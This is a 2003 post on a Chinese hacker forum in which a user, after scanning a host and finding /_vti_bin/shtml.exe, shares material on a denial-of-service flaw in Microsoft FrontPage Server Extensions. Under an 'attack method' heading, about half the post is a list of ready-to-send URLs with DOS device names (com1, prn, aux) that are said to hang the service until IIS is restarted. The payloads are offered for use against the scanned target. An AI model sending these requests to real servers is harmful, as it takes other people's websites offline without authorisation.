标题:
[分享]/_vti_bin/shtml.exe
[打印本页]
作者:
damnyou
时间:
2003-1-6 04:41
标题:
[分享]/_vti_bin/shtml.exe
以前扫到一个/_vti_bin/shtml.exe 的cgi漏洞不知道怎么利用,我找了一下,只找到这些资料,大家分享~
微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞,可能远程关闭一个web站点上的所有FrontPage操作。通过提交一个包含DOS设备名的链接, FrontPage Server Extensions就会挂起,不再响应后续的请求。为了恢复正常工作,必须重新启动IIS或者重新启动机器。
攻击方法:
提交这样的链接,都可能使FrontPage Server Extensions停止响应:
http://www.example.com/_vti_bin/shtml.exe/com1.htm
http://www.example.com/_vti_bin/shtml.exe/prn.htm
http://www.example.com/_vti_bin/shtml.exe/aux.htm
http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm
http://www.example.com/_vti_bin/shtml.exe/com1.asp
http://www.example.com/_vti_bin/shtml.exe/com1
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2